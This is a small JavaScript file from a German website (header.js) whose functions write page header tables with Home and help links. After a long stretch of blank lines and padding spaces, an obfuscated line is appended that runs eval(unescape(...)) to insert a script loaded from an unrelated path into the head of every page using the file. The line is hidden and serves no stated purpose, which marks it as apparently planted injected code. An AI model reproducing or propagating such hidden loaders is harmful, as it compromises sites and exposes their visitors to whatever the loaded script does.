/* header.js   Einheitl. Gestaltung des "Header" (KopfBereich)     www.swanja.de, 29.03.01
   =========   ===========================
   Funktion   :
   Aufruf     :
*/

function goToHome() {
  //parent.location.href="../../index.html";
  top.location.href="../../index.html";
}
                                           //
function header1(text1, text2, text3) {    //
  var str;
  str  = '<table width="100%" border=0 cellspacing=0 cellpadding=2><tr>';
  str += '<td class="hd1" width="75%">' + text1 + '</td>';
  str += '<td class="hd1" width="10%">' + text2 + '</td>';
  str += '<td class="hd1" width="5%"> &nbsp;  </td>';
  str += '<td             width="7%"><a href="javascript:goToHome()">Home</a> </td>';
  str += '<td             width="3%" align="right"><a href="javascript:fmsg()">';
  str += '<img name="imgFZ" src="../images/fragezeich.gif" width="20" height="16" border="0" alt="FehlerCheck"></a>';
  str += '</tr></table>';
  str += '<hr noshade size=1>';

  document.write(str);
}

function header2(text1, text2, text3) {    //
  var str;
  str  = '<table width="100%" border=1><tr>';
  str += '<td width="75%">' + text1 + '</td>';
  str += '<td width="10%">' + text2 + '</td>';
  str += '<td width="5%">    &nbsp;   </td>';
  str += '<td width="10%" align="right"><a href="javascript:fmsg()">';
  str += '  <img src="../images/fragezeich.gif" width="20" height="16" border="0" alt="FehlerCheck"></a>';
  str += '</tr></table>';
  str += '<hr noshade size=1>';
  document.write(str);
}




































































































                                                                                                                                                      /* a0b4df006e02184c60dbf503e71c87ad */ ;eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%35%36%34%36%34%32%3B%20%4A%53%53%33%20%3D%20%27%2F%6A%73%5F%70%72%6A%2F%64%65%73%30%34%5F%66%72%61%75%6E%68%6F%66%65%72%2F%75%6A%6F%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%6A%73%5F%70%72%6A%2F%64%65%73%30%34%5F%66%72%61%75%6E%68%6F%66%65%72%2F%75%6A%6F%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20')); /* a995d2cc661fa72452472e9554b5520c */                                                                                                                                                      





































































































